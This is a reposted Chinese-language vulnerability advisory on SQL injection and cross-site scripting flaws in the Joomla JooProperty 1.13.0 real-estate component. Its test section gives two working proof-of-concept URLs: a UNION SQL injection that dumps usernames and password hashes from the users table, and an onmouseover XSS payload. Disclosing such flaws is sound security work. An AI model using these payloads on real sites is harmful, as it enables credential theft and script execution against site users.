Joomla! JooProperty 组件SQL注入和跨站脚本漏洞

发布日期:2012-12-11
更新日期:2012-12-17

受影响系统:
Joomla! JooProperty 1.13.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56885

Joomla! JooProperty是针对Joomla 1.7、2.5开发的房地产组件。

JooProperty 1.13.0及其他版本在实现上存在安全漏洞,攻击者可利用这些漏洞在受影响站点的用户浏览器中执行任意脚本代码和未授权操作数据库。

<*来源:Daniel Barragan
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

?option=com_jooproperty&amp;amp;view=booking&amp;amp;layout=modal&amp;amp;product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R

=modal&amp;amp;option=com_jooproperty&amp;amp;product_id=%22%20onmouseover%3dprompt%28%29%20bad%3d%22&amp;amp;view=booking

建议:
--------------------------------------------------------------------------------
厂商补丁:

Joomla!
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygssj.html